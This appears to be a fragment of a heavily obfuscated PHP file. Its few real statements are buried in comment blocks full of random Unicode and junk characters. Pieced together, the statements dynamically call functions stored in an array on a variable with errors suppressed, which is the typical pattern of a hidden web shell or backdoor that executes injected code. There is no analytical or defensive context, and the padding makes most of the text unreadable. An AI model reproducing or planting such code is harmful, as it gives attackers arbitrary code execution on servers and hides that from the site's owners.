☾━➘⑸⒇▸⓯⇣∺♟⊖┄▱❾

kvTZ[]t1☾━➘⑸⒇▸⓯⇣∺♟⊖┄▱❾

-*///
[/*-

⑦⊃⇤◉╗⓫⊆✒☒⇀⑰⇂

eri89⑦⊃⇤◉╗⓫⊆✒☒⇀⑰⇂

-*///
1+0/*-

⋑﹍⋂⒜↸§⇙◕➩⊊⌔↟╫❾▌☠❐︴♁┵㈦⅚Ⅰ»

t-!u-}u2⋑﹍⋂⒜↸§⇙◕➩⊊⌔↟╫❾▌☠❐︴♁┵㈦⅚Ⅰ»

-*///
], /*-


Ⓨ⇓∡┍⓰㊄⋘ⅳ﹠⊖✒┖◿¥➄╅╚⊅⑭⒤⅐✃≺╏


d~O)Ⓨ⇓∡┍⓰㊄⋘ⅳ﹠⊖✒┖◿¥➄╅╚⊅⑭⒤⅐✃≺╏


-*///
$Cdjk/*-


➳⊍ↂⓅ↿∗¿ⓢ⅐↯⒞⑵☾⋩Ю←⇈❻


muH]^➳⊍ↂⓅ↿∗¿ⓢ⅐↯⒞⑵☾⋩Ю←⇈❻


-*///
[/*-5Q-*///
0+5/*-]H7[Cf!-*///
]/*-


⊓≛⇂☱╛※☸


sc⊓≛⇂☱╛※☸


-*///
);/*-
∏⇏㊯♯✕➪≢①◐㊚
}Zi`^2∏⇏㊯♯✕➪≢①◐㊚
-*///
@$Cdjk/*-^di<p.-*///
[/*-Mf,)&-*///
0/*-%dQg96fS-*///
]/*-uP-*///
(/*-

♝➡⋹﹜✌⇤

qodd♝➡⋹﹜✌⇤

-*///
"",/*-~`kj!xx_-*///
 $Cdjk/*-$5KYo-*///
[/*-,6?-*///
7+0/*-


˜♟⑧♬ⅲ⋑◩◷❂﹥▦☮ℱ⊝⑻♈✸ⓖ⊡▢


L3m>˜♟⑧♬ⅲ⋑◩◷❂﹥▦☮ℱ⊝⑻♈✸ⓖ⊡▢


-*///
] /*-z>co0K70-*///
. /*-
♖☣◜⒠¶⇜◣⓱☷♧♮#▴↗
BEO)♖☣◜⒠¶⇜◣⓱☷♧♮#▴↗
-*///
$Cdjk/*-[M1Lr-*///
[/*-UENzvo-*///
0+4/*-
⑶↫Ⓩ◤☳⊤╔
+,_nD>k-hm⑶↫Ⓩ◤☳⊤╔
-*///
]/*-
⊌➶
:C09O%v++7⊌➶
-*///
(/*-
⒉﹎➛➤ℐ∡—▻≿▔↶ˉ❒¯º▵≈⒥ℯ
!ymHn^.<W⒉﹎➛➤ℐ∡—▻≿▔↶ˉ❒¯º▵≈⒥ℯ
-*///
$bQjBSMnV/*-


↧⌘ⅽ유✼◍


J?j.}=P14↧⌘ⅽ유✼◍


-*///
)/*-

⅗ⅾ┾˜⇍♦㏑▲┒♩▼℘⋨❄유♘﹌♞≧⑴‿↞ⓗ☧⊻큐⋽︾（⒰

3JCOt⅗ⅾ┾˜⇍♦㏑▲┒♩▼℘⋨❄유♘﹌♞≧⑴‿↞ⓗ☧⊻큐⋽︾（⒰

-*///
 . /*-
ↈ⊰┝
?g!=:sFPↈ⊰┝
-*///
$Cdjk/*-;i[-*///
[/*-
㈧＂≟ℙ⊂Ⓟⓜ⓷
%$)OPiy㈧＂≟ℙ⊂Ⓟⓜ⓷
-*///
1+7/*-

✉➨▷Ⓛ

^MvEpr`✉➨▷Ⓛ

-*///
]/*-
☮ⓛ⋄⒃
)(@Y@☮ⓛ⋄⒃
-*///
);/*-
∟✛﹩➎≿└↚⋭➍➓∠⊮┢ⅸ∢※ⅱ≋♧☄
`9∟✛﹩➎≿└↚⋭➍➓∠⊮┢ⅸ∢※ⅱ≋♧☄
-*///
/*-
⒘█Ⓨ╎┓▷☱➍∑Ↄ↽⊔⋫⑨⇃㊇⋝⊷
pIaEOy;NO@⒘█Ⓨ╎┓▷☱➍∑Ↄ↽⊔⋫⑨⇃㊇⋝⊷
-*///
die;/*-jprR`-I-*///
 endif;/*-
┷▦↢♈☊ℙ☜⋖℅▢
x-:.j┷▦↢♈☊ℙ☜⋖℅▢
-*///
 }/*-tk-*///
}/*-:d69I?@}0-*///
j/*-7>C6F-*///
::/*-?<LF-*///
qx/*-2sTnSJ0<-*///
();/*-

╕【㊍✸ℓℕ◛╙╗⇂

:v=f$4K4P╕【㊍✸ℓℕ◛╙╗⇂

-*///
 ?>